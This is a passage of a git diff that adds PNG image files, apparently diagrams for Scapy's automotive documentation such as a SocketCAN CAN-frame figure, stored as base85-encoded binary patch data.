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 literal 0 HcmV?d00001 diff --git a/doc/scapy/graphics/automotive/can-frame-socket-can.png b/doc/scapy/graphics/automotive/can-frame-socket-can.png new file mode 100644 index 0000000000000000000000000000000000000000..efd96e0314745a095bdca1ffb4c369c172c29041 GIT binary patch literal 14310 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 